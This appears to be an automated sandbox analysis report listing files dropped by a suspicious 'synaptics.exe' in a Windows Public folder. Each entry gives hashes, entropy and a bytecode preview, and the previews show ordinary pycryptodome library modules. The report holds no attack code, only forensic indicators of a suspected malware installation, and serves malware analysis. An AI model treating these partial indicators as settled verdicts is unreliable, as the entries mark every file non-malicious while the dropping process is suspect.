                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6356
                                                                                                                                                                                      Entropy (8bit):5.473579203817209
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:HqnCPUNnFO1qs4mQ8UGLe57h6edAGJHFMxdO3vCqA2MwqQH3SzCFKK0MFBPhXC0I:2/Qzexh6JdtJtAJFPQ9
                                                                                                                                                                                      MD5:BC6C0A5FC43C5764BBCC122A05FEB5B0
                                                                                                                                                                                      SHA1:5357F9A80428E56F507A6E10DA2578201F89D7C1
                                                                                                                                                                                      SHA-256:EF668CAFA554F916DE568DE3850AD6E0790A4A3078049AFE3E5401A4FADED271
                                                                                                                                                                                      SHA-512:6267779DD8C27D617E72A8938F0DCA4728E93ACE3E541B77C054DCE159D559F3ECB3B4B75C57910B27F7C5A0E8447C62A3839A46818F1B58F644E57660224CC8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f. .......................@...s....d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...e.....D...Z.G.d.d...d.e...Z.d.d.d...Z.d.S.)......)...bord..tobytes)...unhexlify)...BLAKE2s)...strxor)...get_random_bytes..new..HMACz.1.2.840.113549.2.7z.1.2.840.113549.2.8z.1.2.840.113549.2.9z.1.2.840.113549.2.10z.1.2.840.113549.2.11z.1.2.840.113549.2.12z.1.2.840.113549.2.13z.2.16.840.1.101.3.4.2.13z.2.16.840.1.101.3.4.2.14z.2.16.840.1.101.3.4.2.15z.2.16.840.1.101.3.4.2.16).z.1.3.14.3.2.26z.2.16.840.1.101.3.4.2.4z.2.16.840.1.101.3.4.2.1z.2.16.840.1.101.3.4.2.2z.2.16.840.1.101.3.4.2.3z.2.16.840.1.101.3.4.2.5z.2.16.840.1.101.3.4.2.6z.2.16.840.1.101.3.4.2.7z.2.16.840.1.101.3.4.2.8z.2.16.840.1.101.3.4.2.9z.2.16.840.1.101.3.4.2.10c....................C...s....i.|.].\.}.}.|.|...q.S...r....)....0..k..vr....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Hash\HMAC.py..<dictcomp>:...s......r....c....................@...sR...e.Z.d.Z.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5410
                                                                                                                                                                                      Entropy (8bit):5.185991714871779
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:mbykvVEVoaG0Ed5cDlD1HkiM7wmZH3wmbOs6Q1/wQbya2qzgRlpXnFMNh:mhEZDkFbAQVwQPsRPA
                                                                                                                                                                                      MD5:7B387DCBE0FF64E66A0409F000C56E61
                                                                                                                                                                                      SHA1:BA8C434139D713B0C0082DE14B8D6A1B5EDBE18A
                                                                                                                                                                                      SHA-256:2C0732BC106CA9813C1502DE55611FBF86DBD287693E5E88916342C649A3BB2E
                                                                                                                                                                                      SHA-512:A16B53EAE40FA4B6F4D5A0D1BCE75B602A7087C330051F6B5EB77068AC0395B25264626FD8F6CC69FEADFC4B895B5970A88899DF33F1967C0F4B2C96F1DE5568
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sd...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.d.Z.d.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5433
                                                                                                                                                                                      Entropy (8bit):5.194071695945998
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:htykvm51RUT7NCaGuEd5SCjor1HcMM7AF8ZH3w7MbOs6IVFya28zTlpXJ1MB5:hc51RC7NrCErcTbAIVjXxU
                                                                                                                                                                                      MD5:FC054BC9F1832F75CDF00192E174C1E6
                                                                                                                                                                                      SHA1:C02759733E9A0222C5980564EB44A1AEE1983162
                                                                                                                                                                                      SHA-256:9CA8288E53E90F163F4311F8AF0675FA184C3A928B582F399EAA54BFE3620114
                                                                                                                                                                                      SHA-512:91E64791FD7D3E7C9B90448420DF429A6D9B1247D335980D120117A89B1DF4B9FD15B3F8522AE93DC2F8B966FA448C5678B1C922113232A871A09866643F1867
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sh...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA1a..... #define SHA1_DIGEST_SIZE 20.. int SHA1_init(void **shaState);. int SHA1_destroy(void *shaState);. int SHA1_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA1_digest(const void *shaState,. uint8_t digest[SHA1_DIGEST_SIZE]);. int SHA1_copy(const void *src, void *dst);.. int SHA1_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5606
                                                                                                                                                                                      Entropy (8bit):5.182727877241171
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rkykv4XXR6TJDkKGAEd5+i5c1HqO2NZH3Hb4fOs6viWkZLgz47MrxK:rhXXR8JD85cyj4fAvTWURK
                                                                                                                                                                                      MD5:93CC88C70E43F0ECF89A5B0EA38F65D2
                                                                                                                                                                                      SHA1:A4A5CD014DB0BD44D24AAA95989DCFD0DB16C4E1
                                                                                                                                                                                      SHA-256:16D8C6FFEE555B1C39A60862E5435EE2F14585E74076848E8EC8F95408878F69
                                                                                                                                                                                      SHA-512:37E0125A884F4DB590AD77CF512050EFACEFB84961A99AB685076297ED10EAD05A482168BDB1E1D37635506B7A8854A4F842EB5FB9AA8C1FB6EB889763A1A671
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sl...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA256a..... int SHA256_init(void **shaState);. int SHA256_destroy(void *shaState);. int SHA256_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA256_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA256_copy(const void *src, void *dst);.. int SHA256_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1705
                                                                                                                                                                                      Entropy (8bit):5.627938515362733
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ZokzpHdkloLwZGD20+wMmqlZ6tB+BTIIIXII5p6:ZlHd/20uSz+BG4
                                                                                                                                                                                      MD5:36985553DC2BA7CF8FDDA194D8455F3F
                                                                                                                                                                                      SHA1:0349CC429634A6A22A16961D6DE5D6AEC711AA4F
                                                                                                                                                                                      SHA-256:95846B15BBFE015862ABEF226C2B0006595CF6830131E04FBD4CD6D36D0E41E7
                                                                                                                                                                                      SHA-512:58D888A284B0F2AA2EFE4AAEB1B1DD8710A9B780490CD4E3D61740FBF6D646363534D2136D13AAFF6A603CE1A27D32E607E376B64F1406A9650670757FB2C03F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....g.d...Z.d.d...Z.d.S.).)...HMACZ.MD2Z.MD4..MD5Z.RIPEMD160..SHA1..SHA224..SHA256..SHA384..SHA512..SHA3_224..SHA3_256..SHA3_384..SHA3_512Z.CMACZ.Poly1305Z.cSHAKE128Z.cSHAKE256Z.KMAC128Z.KMAC256Z.TupleHash128Z.TupleHash256Z.KangarooTwelveZ.TurboSHAKE128Z.TurboSHAKE256c....................C...sT...|.....}.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r<d.d.l.m.}...|.....S.|.d.v.rJd.d.l.m.}...|.....S.|.d.v.rZd.d.l.m.}...|.j.d.d...S.|.d.v.rjd.d.l.m.}...|.j.d.d...S.|.d.v.rxd.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.t.d.t.|.........).zKReturn a new hash instance, based on its name or. on its ASN.1 Object ID).z.1.3.14.3.2.26r....z.SHA-1.....).r....).z.2.16.840.1.101.3.4.2.4r....z.SHA-224).r....).z.2.16.840.1.101.3.4.2.1r....z.SHA-256).r....).z.2.16.840.1.101.3.4.2.2r....z.SHA-384).r....).z.2.16.840.1.101.3.4.2.3r....z.SHA-512).r....).z.2.16.840
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4543
                                                                                                                                                                                      Entropy (8bit):5.783120805321905
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:pClXflwfEc4b6m/KEHSjZtJ4uoJZ/jWR8I4wqAAS4IILLgPT:pCffv6miHZtJ4uOjO8I4wqAATIILEL
                                                                                                                                                                                      MD5:7FC977413F7FDB99751D9D153DF567D3
                                                                                                                                                                                      SHA1:4AA262B9412AC6B202B3ADB3A11253A788426997
                                                                                                                                                                                      SHA-256:E1ED35D861DC85E42309D4DD1FE8B3FF805DC35F9D2F5E6B2BEE4E8F9C5EC6BD
                                                                                                                                                                                      SHA-512:1820F806CB51E43E15AF2BF0CEE2CF8A687E5D97C752539F4EAB40CD73A33F66D216EE4CA6D1EE0CAD11FA4734B1CC4D0160086D21090FFD93D0954A1036FC74
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...encode..decode.....N)...a2b_base64..b2a_base64..hexlify..unhexlify)...MD5)...pad..unpad)...DES..DES3..AES)...PBKDF1)...get_random_bytes)...tobytes..tostrc........................s....|.d.u.r.t.}.d.|...}.|.rB|.d...}.t.|.|.d.d.t...}.|.t.|.|...|.d.d.t...7.}.t...|.t.j.|...}.|.d.t.t.|...........7.}.|...t...|.j.......n.|.d.u.rJt.d.......f.d.d...t.d.t.....d...D...}.|.d...|...7.}.|.d.|...7.}.|.S.).a4...Encode a piece of binary data into PEM format... Args:. data (byte string):. The piece of binary data to encode.. marker (string):. The marker for the PEM block (e.g. "PUBLIC KEY").. Note that there is no official master list for all allowed markers.. Still, you can refer to the OpenSSL_ source code.. passphrase (byte string):. If given,
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):187
                                                                                                                                                                                      Entropy (8bit):5.092460882202697
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/hUlGptBlxnzgmgudWEJDkzzXhm1aHF50YTlHX0M9VWrz4ixikcTgf:y/RpznzgmgSW+91aHxEM9ArMAy+
                                                                                                                                                                                      MD5:6F8A5A9A3D7020C0B4B7E98AF0C553E9
                                                                                                                                                                                      SHA1:32BF262084DC8EDC9B352EA56ED1698408D28A25
                                                                                                                                                                                      SHA-256:4B98AFB16394E7922B00E7BF19230531799530105025689862C43E81764E2AB2
                                                                                                                                                                                      SHA-512:7FC47D95212EF6B505D2AEAFAF9D8375912491FFE0474A4FDD0FBC05AE1AAEE69D5AB95742B9AF615C5935F508F13D51E0F7679EB48BDE3A681250F40BD14547
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f#........................@...s....d.d.g.Z.d.S.)...PEM..PKCS8N)...__all__..r....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\IO\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):563
                                                                                                                                                                                      Entropy (8bit):5.388480206069932
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:C4jXHzW76nDBG45OUZLvZHLSIj0pPvZHLOkvZHLa8lhTKJgD:TjMiFLvZWIjUvZ5vZGwh5
                                                                                                                                                                                      MD5:A7472E2CA84BA4DE83FBF8CF1179E5DC
                                                                                                                                                                                      SHA1:7F8A895411D254F56F4294810D152594425AAD4E
                                                                                                                                                                                      SHA-256:5D03BEA584D595DA32839919352921B3E3EC33EDC2DFC5E512886DD5735A108A
                                                                                                                                                                                      SHA-512:803E5824DC912A86011A11F3D4EDF1EC7DB7A263A07B099F52A793CB5E18C5BF00CFF67BC78BAF9C678295AF9FAA31A7DD3E4E34E68ABFD12C7EB35B0DAE3E32
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.g.Z.z.d.d.l.m.Z...d.d.l.m.Z...W.d.S...e.e.e.f.yB......z.d.d.l.m.Z...d.d.l.m.Z...W.Y.d.S...e.e.f.yA......d.d.l.m.Z...i.Z.Y.Y.d.S.w.w.)...Integer.....)...IntegerGMP)...implementation)...IntegerCustom)...IntegerNativeN)...__all__Z.Crypto.Math._IntegerGMPr....r....r....Z._implementation..ImportError..OSError..AttributeErrorZ.Crypto.Math._IntegerCustomr....Z.Crypto.Math._IntegerNativer......r....r.....EC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Math\Numbers.py..<module>....s..............................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7442
                                                                                                                                                                                      Entropy (8bit):5.519481103300708
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:sfN8ODJyBGU8lODJq3D6Gd5+zbXQO5qcUd:sqc3OGdmtW
                                                                                                                                                                                      MD5:59C454D6D589E66F1AAFF2DE61861942
                                                                                                                                                                                      SHA1:8D23E1F86012322F06072CDC0D2112DE9878012A
                                                                                                                                                                                      SHA-256:7EFD0A16A38975C123597BED26E94744C48A5F9B721CC1F1F6BE6F371CA37019
                                                                                                                                                                                      SHA-512:59B9ABC2BF6FBD7586D84B1C3CC739E77D0007EE130A233A35655CFBCCDCE4D567EF64E1536D1F8B73214DDE8A2601BB34A80ECDDAD659227B2696592E7441D5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.-.......................@...s|...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d.d...Z.d.d...Z.d.d.l.m.Z...e.e.d.d.......Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).zHFunctions to create and test prime numbers...:undocumented: __package__......)...Random)...Integer)...iter_range.....Nc....................C...s<...t.|.t...s.t.|...}.|.d.v.r.t.S.|.....r.t.S.t.d...}.t.|.d.....}.|.d.u.r(t.....j.}.t.|...}.d.}.|.....r>|.d.L.}.|.d.7.}.|.....s2t.|...D.]Y}.d.}.|.|.|.f.v.rlt.j.d.|.d...|.d...}.d.|.....k.rc|.d...k.sfJ.....J...|.|.|.f.v.sLt.|.|.|...}.|.|.|.f.v.ryqBt.d.|...D.].}.t.|.d.|...}.|.|.k.r...n.|.|.k.r.t.........S.q~t.....S.qBt.S.).a:...Perform a Miller-Rabin primality test on an integer... The test is specified in Section C.3.1 of `FIPS PUB 186-4`__... :Parameters:. candidate : integer. The number to test for primality.. iterations : integer. The maximum number of iterations to perform before. declaring a candidate a probable prime.. randfunc
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11443
                                                                                                                                                                                      Entropy (8bit):4.986033275730306
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:uj5Panlqjgi/xVcz2QRUtIs3J3Aqqk0ruPuRfNob3l8kKlzC2WrUkvh:ujMlqjgEVcz2QCtIs3J3AqJZb36kK5Ct
                                                                                                                                                                                      MD5:F52CBC77CF2531E104A6CB0E7E9527A9
                                                                                                                                                                                      SHA1:804BF1581F24DA5EDAC71B3708B5FE87A89E13A0
                                                                                                                                                                                      SHA-256:25DD556DD8062AFFEE252BF331C33DA7C5257BB904DD8EC2C415910B68B6DA8F
                                                                                                                                                                                      SHA-512:989C6801CEA4FEE23119A2625A25EEF41C65095FB709302311F63F3DB31ECBA0A5F67B58423905C72F28B48CCA95590783247233D0FA6168DDB7D389893AA3CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.-.......................@...s@...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N)...iter_range..bord..bchr..ABC)...Randomc....................@...s....e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.dhd.d.....Z.e.e.j.did.d.......Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d ....Z.e.j.d!d"....Z.e.j.d#d$....Z.e.j.d%d&....Z.e.j.djd(d)....Z.e.j.djd*d+....Z.e.j.d,d-....Z.e.j.djd.d/....Z.e.j.d0d1....Z.e.j.d2d3....Z.e.j.d4d5....Z.e.j.d6d7....Z e.j.d8d9....Z!e.j.d:d;....Z"e.j.d<d=....Z#e.j.d>d?....Z$e.j.d@dA....Z%e.j.dBdC....Z&e.j.dDdE....Z'e.j.dFdG....Z(e.j.dHdI....Z)e.j.dJdK....Z*e.j.dLdM....Z+e.j.dNdO....Z,e.j.dPdQ....Z-e.j.dRdS....Z.e.j.dTdU....Z/e.j.dVdW....Z0e.j.dXdY....Z1e.j.dZd[....Z2e.j.d\d]....Z3e.e.j.d^d_......Z4e.d`da....Z5e6dbdc....Z7e6ddde....Z8e.e.j.dfdg......Z9d'S.)k..IntegerBasec....................C........d.S...N......selfr....r.....JC:\Us
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2963
                                                                                                                                                                                      Entropy (8bit):5.417697241112068
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:vXkxRn/584h+MihBCNnK3FN1UfeLdyyVNRYtCmVMclu06OJGsvpuI9vprfgDzkWp:vXkv/YXhB829bgkmVMeX6cp1prfgDHb9
                                                                                                                                                                                      MD5:03A3FCE262B431FA36E054810A31CE90
                                                                                                                                                                                      SHA1:065BC683022DB53C3F451519A1296DB3A7981958
                                                                                                                                                                                      SHA-256:7B0BC960DFE03746D6E3A1C444C4982B27D4A08252731E25D1973FC351CD07C3
                                                                                                                                                                                      SHA-512:01A32808755DB935650E82703095AE5738C3CA05A90E5205DAD9769C0B4F4A897D6FE873CB94216BEB38B88B1D4A7B012AEE039DE1236F2F275473A106EA6034
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...st...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.d.e...Z.d.e.d...Z.G.d.d...d.e...Z.d.S.)......)...IntegerNative.....)...long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..backend..c_size_t..c_ulonglong)...getrandbitsa.....int monty_pow(uint8_t *out,. const uint8_t *base,. const uint8_t *exp,. const uint8_t *modulus,. size_t len,. uint64_t seed);..int monty_multiply(uint8_t *out,. const uint8_t *term1,. const uint8_t *term2,. const uint8_t *modulus,. size_t len);.z.Crypto.Math._modexpZ.custom)...library..apic....................@...s0...e.Z.d.Z.e.d.d.d.....Z.d.d.d...Z.e.d.d.....Z.d.S.)...IntegerCustom..bigc....................C...s8...|.d.k.r.n.|.d.k.r.t.|...}.|.......n.t.d.....t.t.|.....S.).Nr......lit
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 512-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, maximum point enabled, userbration: offset 0.000000, slope 128.000000
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20453
                                                                                                                                                                                      Entropy (8bit):5.2861292003326135
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:QHCMZp3pZsEbpnho9ak9blkWhHJM+RS23v6rzlW1353/dsgu2OgRK:NMZxpGapnhrk9blkWNEHIpRuIRK
                                                                                                                                                                                      MD5:A5B62210B93CF8A845341138C0DC27FB
                                                                                                                                                                                      SHA1:9D4270781DCB477A78E99505B93C52C9759C990E
                                                                                                                                                                                      SHA-256:47AE6D7EA3C41BF56F017ADD144BC0F7590528EB8285D4CCA9059928921ECC4E
                                                                                                                                                                                      SHA-512:4BE9408AF969C6329CF78D093BA0AF39B46E680D331F7D57800327B5603DC3FD314D10C66E94A5170D8A966BEE35C7F06487DA9478B0E5D0A2237EBCAA8FFF07
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fUn.......................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.j.d.k.r3e.d.....e.d.e...Z.d.e.d...Z.e.e.d...rFe.d.....e.d...d.k.red.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.d...Z.n.d.d.l.m.Z...d.d...Z.G.d.d...d.e...Z.e...Z G.d.d...d.e...Z!d.S.)......N)...tobytes..is_native_int)...backend..load_lib..get_raw_buffer..get_c_string..null_pointer..create_string_buffer..c_ulong..c_size_t..c_uint8_ptr.....)...IntegerBaseaY...typedef unsigned long UNIX_ULONG;. typedef struct { int a; int b; void *c; } MPZ;. typedef MPZ mpz_t[1];. typedef UNIX_ULONG mp_bitcnt_t;.. void __gmpz_init (mpz_t x);. void __gmpz_init_set (mpz_t rop, const mpz_t op);. void __gmpz_init_set_ui (mpz_t rop, UNIX_ULONG op);.. UNIX_ULONG __gmpz_get_ui (const mpz_t op);. void __gmpz_set (mpz_t rop, const mpz_t op);. void __gmpz_set_ui (mpz_t rop, UNIX_ULONG op);. void __gmpz_add (mpz_t rop, co
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10703
                                                                                                                                                                                      Entropy (8bit):4.874587424670691
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:yfddwtdzk05NpqTIIsPg96w9MOpdClFUeh/z5p3SCS2gp/cj1GiXB6ITVaw3+3Zz:y3OdzN5NpqTIIsEVFnG7h/LSCS2i0j1o
                                                                                                                                                                                      MD5:AD5F1E528713BBFDAFE882E131D8D7A0
                                                                                                                                                                                      SHA1:27AF0BF429E531584DA3B2F96C4CE4CDED31FBA4
                                                                                                                                                                                      SHA-256:C53E701770946807B7124AFCA8572167D5B7C55EDF2D648B340EB6651E5E4607
                                                                                                                                                                                      SHA-512:ED10F604886F085A5D3ED401E41B0627FABF25AD6D764E6FE8387D983A974531DBF3E70A63C95C683465AD9671AC51A633CDD43C246761197F6642A7C6FD3A7A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.-.......................@...s8...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.S.)......)...IntegerBase.....)...long_to_bytes..bytes_to_long..inverse..GCDc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.did.d...Z.e.djd.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e.Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.dkd/d0..Z.dkd1d2..Z.d3d4..Z.dkd5d6..Z.d7d8..Z.d9d:..Z d;d<..Z!d=d>..Z"d?d@..Z#dAdB..Z$dCdD..Z%dEdF..Z&dGdH..Z'dIdJ..Z(dKdL..Z)dMdN..Z*dOdP..Z+dQdR..Z,dSdT..Z-dUdV..Z.dWdX..Z/dYdZ..Z0d[d\..Z1d]d^..Z2d_d`..Z3dadb..Z4dcdd..Z5e6dedf....Z7e6dgdh....Z8d.S.)l..IntegerNativez3A class to model a natural integer (including zero)c....................C...s<...t.|.t...r.t.d.....z.|.j.|._.W.d.S...t.y.......|.|._.Y.d.S.w.).Nz-A floating point type is not a natural number)...isinstance..float..ValueError.._value..AttributeError)...self..value..r.....LC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Math\_In
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):163
                                                                                                                                                                                      Entropy (8bit):4.619118590995775
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/hcGllluleh/wZWejIaHF50YTlHX0M9VWrz4mLOkcTgp:y/Vl/qeh/wvIaHxEM9ArMF4
                                                                                                                                                                                      MD5:F46A4082231B706D0CC924A76F6FBDE2
                                                                                                                                                                                      SHA1:07A389746C9BF8A2FC47131C3770F7722937C90A
                                                                                                                                                                                      SHA-256:C074FC6E78CE9F124B53DA1B9556E441A7AA18092A6C6260C69E09DF5239EFF7
                                                                                                                                                                                      SHA-512:E138409D74E0856338B365FA1BDDF58415B42EC6BE1AC3A8F5ED1D1DECDAABECEE23BF08FB07763C92805BD65131F995A928DA1BE722D838D18987ECECF908A0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.S.).N..r....r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Math\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20415
                                                                                                                                                                                      Entropy (8bit):5.443242297483508
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:KwGALFMLX4XG+dj/WacI0yhn4HytBQwOTZ8UfXpmJWa7Bbq2KhVCIOG:KdAemj/iI0yh4HytOqUfAJWmbTMBOG
                                                                                                                                                                                      MD5:903435CB077CE4003E1946B42105EC4A
                                                                                                                                                                                      SHA1:20EFD7F8DAB471B4DF7A59A087B270F8F237960E
                                                                                                                                                                                      SHA-256:E01CE00BAA4CEE2991561327381842B44EF1F0EEC254F022F2DCAF11E927F3CB
                                                                                                                                                                                      SHA-512:EEB10BC15174E88574C5A3160E29994BC9C929E5845605F97755F3AA844ED41BBDED0265929A34A510FA0C4FD3757D4EFFB4D69956929F68C8D4C6CA0C58945E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
